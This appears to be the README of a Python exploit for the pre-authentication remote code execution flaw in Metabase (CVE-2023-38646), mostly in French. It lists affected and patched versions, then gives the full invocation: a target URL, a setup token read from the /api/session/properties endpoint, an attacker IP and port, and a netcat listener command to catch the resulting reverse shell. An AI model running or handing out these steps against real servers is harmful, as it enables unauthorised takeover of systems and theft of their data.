
Exploit Python pour l'exécution de code à distance pré-authentification Metabase (CVE-2023-38646) avec livraison de charge utile de shell inversé.
Les versions open source de Metabase antérieures à 0.46.6.1 et les versions Enterprise de Metabase antérieures à 1.46.6.1 permettent aux attaquants d'exécuter des commandes arbitraires sur le serveur, avec le niveau de privilège du serveur. L'authentification n'est pas requise pour l'exploitation. Les autres versions corrigées sont 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 et 1.43.7.2.
python3 exploit.py -u http://vulnerablewebsite.com -t "537up-70k3n-fr0m-4p1-535510n" -i 10.10.10.10 -p 9001
where:
-u: the URL for the vulnerable website
-t: the setup token taken from http://vulnerablewebsite.com/api/session/properties
-i: host IP address (your IP address)
-p: host port for connection
nc -lvnp 9001